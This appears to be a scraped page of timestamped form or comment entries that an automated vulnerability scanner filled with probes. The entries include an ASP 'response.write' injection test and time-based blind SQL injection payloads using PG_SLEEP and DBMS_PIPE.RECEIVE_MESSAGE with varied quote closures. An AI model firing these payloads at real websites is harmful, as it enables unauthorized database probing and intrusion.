 • response.write(9948549*9619366)

  2021-05-06 07:44:56


  1


 • pHqghUme

  2021-05-06 07:44:56


  1


 • '+response.write(9948549*9619366)+'

  2021-05-06 07:44:56


  1


 • pHqghUme

  2021-05-06 07:44:55


  1


 • pHqghUme

  2021-05-06 07:44:55


  1


 • pHqghUme

  2021-05-06 07:44:54


  1


 • pHqghUme

  2021-05-06 07:44:53


  1


 • pHqghUme

  2021-05-06 07:44:53


  1


 • pHqghUme

  2021-05-06 07:44:51


  1


 • pHqghUme

  2021-05-06 07:44:50


  1


 • pHqghUme

  2021-05-06 07:42:59


  1


 • pHqghUme

  2021-05-06 07:42:36


  1


 • pHqghUme

  2021-05-06 07:36:49


  1


 • pHqghUme

  2021-05-06 07:36:34


  1


 • pHqghUme

  2021-05-06 07:36:21


  1Fr2y6KxO


 • 1aAFC9L4O

  2021-05-06 07:36:20


  1


 • pHqghUme

  2021-05-06 07:36:18


  1


 • pHqghUme

  2021-05-06 07:36:17


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme

  2021-05-06 02:25:37


  @@ATa0s


 • pHqghUme

  2021-05-06 02:25:34


  1'"


 • pHqghUme

  2021-05-06 02:25:33


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 02:25:25


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 02:25:17


  phTg9NHj')) OR 726=(SELECT 726 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:25:05


  9aBRhMUP') OR 919=(SELECT 919 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:24:39


  e3E7XT3w' OR 850=(SELECT 850 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:24:13


  -1)) OR 512=(SELECT 512 FROM PG_SLEEP(15))--